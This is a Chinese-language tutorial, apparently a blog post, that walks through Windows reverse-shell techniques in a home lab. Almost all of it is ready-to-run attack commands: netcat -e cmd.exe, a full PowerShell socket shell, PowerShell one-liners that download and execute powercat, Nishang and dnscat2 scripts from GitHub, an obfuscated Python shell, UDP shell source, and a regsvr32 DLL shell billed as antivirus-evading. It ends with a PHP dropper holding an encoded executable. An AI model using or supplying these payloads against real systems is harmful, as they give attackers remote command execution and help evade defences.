windows反弹shell复现

admin管理员组

文章数量:1543573

windows反弹shell

简介：

reverse shell（反弹shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell类似，本质上是网络概念的客户端与服务端的角色反转，就是让目标机执行反向连接攻击机。

在实战中多配置命令执行等漏洞进行使用。

环境：

攻击机：IP为192.168.1.111，系统信息 Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

目标机：IP为192.168.1.108，系统信息 Microsoft Windows 11 专业版

原理示意图：

一、netcat-windows反弹（nc反弹）：需要攻击机安装netcat,通过netcat建立反向连接。

攻击机监听: nc -lvvp 6666

目标机执行: nc 192.168.1.111 6666 -e c:\windows\system32\cmd.exe 

攻击机：

目标机：

二、Powershell-windows反弹

Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念，从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。

一旦攻击者可以在一台计算机上运行代码，他们便可以下载powershell脚本文件（.ps1）到磁盘执行，脚本可以在内存中运行(无文件化)。我们可以将powershell看做是命令提示符cmd.exe的扩展。

powercat为Powershell版的Netcat，实际上是一个powershell的函数，使用方法类似Netcat。

1、使用powercat

攻击机监听:

nc -lvp 6666

目标机执行（通过github远程下载执行）：

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.1.111 -p 6666 -e cmd

攻击机：

目标机：

2、使用powershell函数执行

攻击机监听:

 nc -lvp 6666

目标机执行：

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.111',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

攻击机：

目标机：

3、Reverse TCP shell

Nishang(https://github/samratashok/nishang )，是一个基于PowerShell的攻击框架，集合了一些PowerShell攻击脚本和有效载荷，可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

需要用哪种反弹方式可以去github上选择，在攻击机执行的payload修改对应shell地址就行。

Nishang要在PowerShell3.0以上的环境下才可以正常使用，在window 7或者server2008上可能会出现一些异常。

关于使用nishang进行反弹是通过powershell远程调用github上的powershell脚本进行反弹连接。

Nishang项目展示：

攻击机监听:

 nc -lvp 6666

目标机执行（此处使用github远程调用，也可将nishang下载到本地调用执行）：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.111 -port 6666

攻击机：

目标机：

4、Reverse UDP shell

攻击机监听:

nc -lup 5399

目标机执行：

第一个：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.1.111 -port 5399

第二个（两个都可以，只是不同的远程地址）：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.1.111 -port 5399
​

攻击机：

目标机：

5、Reverse ICMP shell

需要利用icmpsh_m.py (https://github/bdamele/icmpsh)和nishang中的Invoke-PowerShellIcmp.ps1 来反弹ICMP shell。

首先攻击端下载icmpsh_m.py文件：

icmpsh_m.py  Usage（使用说明）：

python icmpsh_m.py [Attacker IP] [Victim IP]

攻击机监听：

sysctl -w net.ipv4.icmp_echo_ignore_all=1       #关闭kali自身的icmp，避免影响攻击机向目标机发送的信息。sysctl命令可能需要修复，执行rm -f /sbin/sysctl 和 ln -s /bin/true /sbin/sysctl两条命令。

python icmpsh_m.py 192.168.1.111 192.168.1.108   #开启ICMP数据监听，需要攻击机具有python环境，可能会报错 You need to install Python Impacket library first，需要安装Impacket库：

git clone https://github/CoreSecurity/impacket.git     #步骤1

cd impacket/  #步骤2

python setup.py install      #步骤3
​

备注：Impacket解释参考：Impacket官方使用指南 - 渗透测试中心 - 博客园

目标机执行：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent/samratashok/nishang/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp -IPAddress 192.168.1.111

攻击机：

目标机

6、Reverse HTTP/HTTPS shell （只尝试了HTTP）

攻击机监听：nc -lvvp 4444

目标机执行：(无法执行，提示调用powershel脚本编写错误，以下两个反弹都无法使用)

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent/samratashok/nishang/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PoshRatHttp.ps1');Invoke-PoshRatHttp -IPAddress 192.168.1.111 -Port 4444

7、dnscat2 反弹DNS shell

dnscat2(https://github/iagox86/dnscat2 )是一个DNS隧道，旨在通过DNS协议创建加密的命令和控制（C＆C）通道。dnscat2分为两部分：客户端和服务器。dnscat2客户端采用C语言编写，服务器端采用ruby语言编写。后来又有安全研究人员使用PowerShell脚本重写了dnscat2客户端dnscat2-powershell(https://github/lukebaggett/dnscat2-powershell)

Ruby，一种简单快捷的面向对象（面向对象程序设计）脚本语言。

服务端为Ruby编写，需安装Ruby环境，下面连接为kali配置dnscat2参考：

【内网流量操控技术五】dnscat2配置_redwand的博客-CSDN博客_dnscat2

执行bundle install时卡住，更换dnscat2/server目录下Gemfile文件中ruby源地址为https://gems.ruby-china，因原来地址已不支持下载。

更新前：

更新后：

更新后正常下载：

攻击机监听：

sudo ruby dnscat2.rb --dns "domain=lltest,host=192.168.1.111" --no-cache -e open

目标机执行：

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest -DNSServer 192.168.1.111

成功反弹shell后，攻击机执行：

session -i 1 #第一步，进入到session 1

shell        #第二步，执行后生成新的session 需要通过session -1 2 切换

session -i 2 #第三步，在目标机执行命令

攻击机：

目标机：

三、python2 反弹 shell

被攻击机需要python环境

1、python2 TCP shell

攻击机监听：

nc -lvvp 4444

目标机执行：

python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('192.168.1.111', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\windows\system32\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

攻击机：

目标机：

2、python UDP反弹shell

用到：https://github/ecthros/udpshell/blob/master/udpshell.py

udpshell.py源码：

import socket

import subprocess

import sys

from random import randint

#receive data, send to popen, send back

if(len(sys.argv) < 2):

print("Usage: ./udpshell <send_ip> <send_port>")

exit(1)

recv_ip = "0.0.0.0"

recv_port = randint(1024, 65535)

send_ip = sys.argv[1] #127.0.0.1

send_port = int(sys.argv[2]) #5005

#print("Your client should be: python udpclient.py " + sys.argv[3] + " " + sys.argv[2] + " " + sys.argv[1])

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP

sock.bind((recv_ip, recv_port))

#sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP

sock.sendto("Begin Connection id: 3242", (send_ip, send_port))

while True:

command, addr = sock.recvfrom(1024) # buffer size is 1024 bytes

if(command == "exit"):

break

proc = subprocess.Popen([command], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)

output = proc.stdout.read() + proc.stderr.read()

sock.sendto(output, (send_ip, send_port))

攻击机监听：

nc -lup 555

目标机执行：

python udpshell.py 192.168.1.111 555 udp

攻击机：

目标机：

四、dll 反弹 shell

借助反弹工具 by T00Ls.NET 工具。（火绒免杀20220406）

工具下载地址：

链接：https://pan.baidu/s/11h6NCHyZuYY2UVG-X6kEuA

提取码：jnsz

生成dll文件上传至攻击端，运行命令

regsvr32 /s /u server.dll

攻击机监听：

nc -lvvp 4444

目标机执行：

regsvr32 /s /u server_x64.dll

攻击机：

目标机:

五、PHP 反弹 shell

需要php未禁用exec函数。

php文件源码：

<?php

$ip   = "192.168.1.159"; //攻击机IP

$port = "4444"; //监听端口

$payload = "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";$evalCode = gzinflate(base64_decode($payload));$evalArguments = " ".$port." ".$ip;$tmpdir ="C:\windows\temp";chdir($tmpdir);$res .= "Using dir : ".$tmpdir;$filename = "D3fa1t_shell.exe";$file = fopen($filename, 'wb');fwrite($file, $evalCode);fclose($file);$path = $filename;$cmd = $path.$evalArguments;$res .= "nnExecuting : ".$cmd."n";echo $res;$output = system($cmd);                
?>

攻击机监听：

nc -lvvp 4444

目标机执行：目标机在php环境下访问此php文件即可生成交互式反弹shell

攻击机：

参考：powershell反弹shell常见方式 - 安全客，安全资讯平台

      反弹shell之Windows反向shell | CN-SEC 中文网

本文标签： WindowsShell